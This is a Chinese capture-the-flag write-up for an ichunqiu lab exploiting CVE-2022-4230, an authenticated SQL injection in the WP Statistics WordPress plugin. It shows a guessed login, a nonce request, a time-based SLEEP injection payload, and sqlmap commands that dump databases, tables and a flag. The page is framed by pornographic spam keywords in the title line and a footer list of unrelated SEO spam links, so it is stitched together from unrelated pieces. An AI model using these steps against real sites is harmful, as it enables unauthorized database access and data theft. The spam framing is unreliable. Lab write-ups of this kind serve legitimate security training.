中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

wordpress 插件頁(yè)面seo關(guān)鍵詞排名點(diǎn)擊工具

wordpress 插件頁(yè)面,seo關(guān)鍵詞排名點(diǎn)擊工具,重慶seo標(biāo)準(zhǔn),中山專業(yè)門(mén)戶網(wǎng)站制作平臺(tái)目錄 靶標(biāo)介紹 開(kāi)啟靶場(chǎng) wpscan漏洞介紹 查詢數(shù)據(jù)庫(kù)表名 查詢表中字段名 查詢字段下數(shù)據(jù) 靶標(biāo)介紹 WP Statistics WordPress 插件13.2.9之前的版本不會(huì)轉(zhuǎn)義參數(shù),這可能允許經(jīng)過(guò)身份驗(yàn)證的用戶執(zhí)行 SQL 注入攻擊。默認(rèn)情況下,具有管理選項(xiàng)功能 (ad…

目錄

靶標(biāo)介紹

開(kāi)啟靶場(chǎng)

wpscan漏洞介紹

查詢數(shù)據(jù)庫(kù)表名

查詢表中字段名

查詢字段下數(shù)據(jù)


靶標(biāo)介紹

WP Statistics WordPress 插件13.2.9之前的版本不會(huì)轉(zhuǎn)義參數(shù),這可能允許經(jīng)過(guò)身份驗(yàn)證的用戶執(zhí)行 SQL 注入攻擊。默認(rèn)情況下,具有管理選項(xiàng)功能 (admin+) 的用戶可以使用受影響的功能,但是該插件有一個(gè)設(shè)置允許低權(quán)限用戶也可以訪問(wèn)它。

開(kāi)啟靶場(chǎng)

開(kāi)啟靶場(chǎng)之后,發(fā)現(xiàn)什么都沒(méi)有,所以我們進(jìn)行目錄掃描,這里我使用的是御劍目錄掃描工具

訪問(wèn) license.txt 無(wú)收獲,訪問(wèn) resdme.html 發(fā)現(xiàn)以下頁(yè)面

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html

點(diǎn)擊 login page,發(fā)現(xiàn)了一個(gè)登錄頁(yè)面

試了用戶名和密碼是 admin 之后并無(wú)發(fā)現(xiàn),左下角有一個(gè)“返回到 test”,說(shuō)明 test 大概率是用戶,嘗試登錄一下

發(fā)現(xiàn)登錄成功了

wpscan漏洞介紹

根據(jù)靶標(biāo)介紹,這里有插件漏洞,鏈接:WP Statistics < 13.2.9 – 經(jīng)過(guò)身份驗(yàn)證的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有興趣可以了解下

意思大概是這樣的:以允許查看WP統(tǒng)計(jì)信息的用戶身份登錄,并通過(guò)獲取隨機(jī)數(shù)“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”,并在下面的URL中使用它,該URL將延遲5s

首先通過(guò)訪問(wèn),獲得隨機(jī)數(shù)(必須要先登錄過(guò)后臺(tái)才行)

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

獲得隨機(jī)數(shù)之后,把隨機(jī)數(shù)添加到下面那個(gè) URL 中,訪問(wèn)一下試試,這里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了,不加這條語(yǔ)句不影響最終結(jié)果

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa

訪問(wèn)之后發(fā)現(xiàn)了這個(gè)頁(yè)面,然后用 Burp 抓個(gè)包吧

把數(shù)據(jù)包復(fù)制到一個(gè)文本里,重命名為 test.txt 拖進(jìn) kali 桌面,在桌面打開(kāi)終端使用 sqlmap 工具跑一下

sqlmap -r test.txt --batch --dbs

發(fā)現(xiàn)了 wordpress 敏感數(shù)據(jù)庫(kù)

查詢數(shù)據(jù)庫(kù)表名

sqlmap -r test.txt --batch -D wordpress --tables

發(fā)現(xiàn)了一個(gè) flag 表

查詢表中字段名

sqlmap -r test.txt --batch -D wordpress -T flag --columns

發(fā)現(xiàn)字段名是 flag

查詢字段下數(shù)據(jù)

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump

發(fā)現(xiàn)了 flag

http://www.risenshineclean.com/news/57694.html

相關(guān)文章:

  • 新浪推網(wǎng)站阿里大數(shù)據(jù)官網(wǎng)
  • 泉州網(wǎng)站建設(shè)公司首選網(wǎng)站綜合查詢工具
  • 個(gè)人適合做什么網(wǎng)站域名??烤W(wǎng)頁(yè)推廣大全
  • 英文 日文網(wǎng)站建設(shè)申請(qǐng)線上營(yíng)銷(xiāo)的優(yōu)勢(shì)
  • 一級(jí)a做爰片在線看網(wǎng)站公司搜索seo
  • 襄陽(yáng)營(yíng)銷(xiāo)型網(wǎng)站愛(ài)站網(wǎng)絡(luò)挖掘詞
  • 深圳最新消息公布長(zhǎng)沙seo服務(wù)
  • 做調(diào)查問(wèn)卷賺錢(qián)網(wǎng)站有哪些培訓(xùn)seo哪家學(xué)校好
  • 網(wǎng)站建設(shè)投訴去哪里投訴軟件推廣的渠道是哪里找的
  • 什么是網(wǎng)站域名?會(huì)計(jì)培訓(xùn)班要多少錢(qián)一般要學(xué)多久
  • 電子商務(wù)網(wǎng)站建設(shè)與管理習(xí)題答案免費(fèi)服務(wù)器
  • 免費(fèi)網(wǎng)站推廣工具有哪些百度搜索排行榜前十名
  • 如何做網(wǎng)站的的關(guān)鍵詞網(wǎng)絡(luò)培訓(xùn)學(xué)校
  • 免費(fèi)做網(wǎng)站wxp114百度愛(ài)采購(gòu)優(yōu)化軟件
  • 長(zhǎng)春市疫情最新消息今天行動(dòng)軌跡湖南網(wǎng)站seo營(yíng)銷(xiāo)
  • 258做網(wǎng)站怎么樣網(wǎng)站排名優(yōu)化+o+m
  • 自己做優(yōu)惠劵網(wǎng)站賺錢(qián)嗎網(wǎng)站seo是干什么的
  • 響應(yīng)式網(wǎng)站新聞部分怎么做aso優(yōu)化軟件
  • 順徳網(wǎng)站建設(shè)公司有哪些搜索關(guān)鍵詞排名優(yōu)化軟件
  • 臨沂品牌網(wǎng)站推廣人民日?qǐng)?bào)今日新聞
  • ui設(shè)計(jì)技術(shù)培訓(xùn)學(xué)校十堰seo優(yōu)化
  • 房產(chǎn)這么做網(wǎng)站才多點(diǎn)擊量2023新聞熱點(diǎn)摘抄
  • 佳木斯建設(shè)工程交易中心網(wǎng)站自助建站
  • 建筑培訓(xùn)網(wǎng)站網(wǎng)絡(luò)廣告策劃的內(nèi)容
  • 青縣做網(wǎng)站價(jià)格好看的網(wǎng)站ui
  • 手機(jī)網(wǎng)站開(kāi)放關(guān)鍵詞排名點(diǎn)擊軟件工具
  • 怎么做網(wǎng)站報(bào)告網(wǎng)絡(luò)輿情分析研判報(bào)告
  • 推薦10個(gè)網(wǎng)站電子商務(wù)網(wǎng)站開(kāi)發(fā)
  • 天眼查 企業(yè)查詢官網(wǎng)seo網(wǎng)站推廣優(yōu)化
  • 網(wǎng)站設(shè)計(jì)網(wǎng)站開(kāi)發(fā)百度推廣投訴人工電話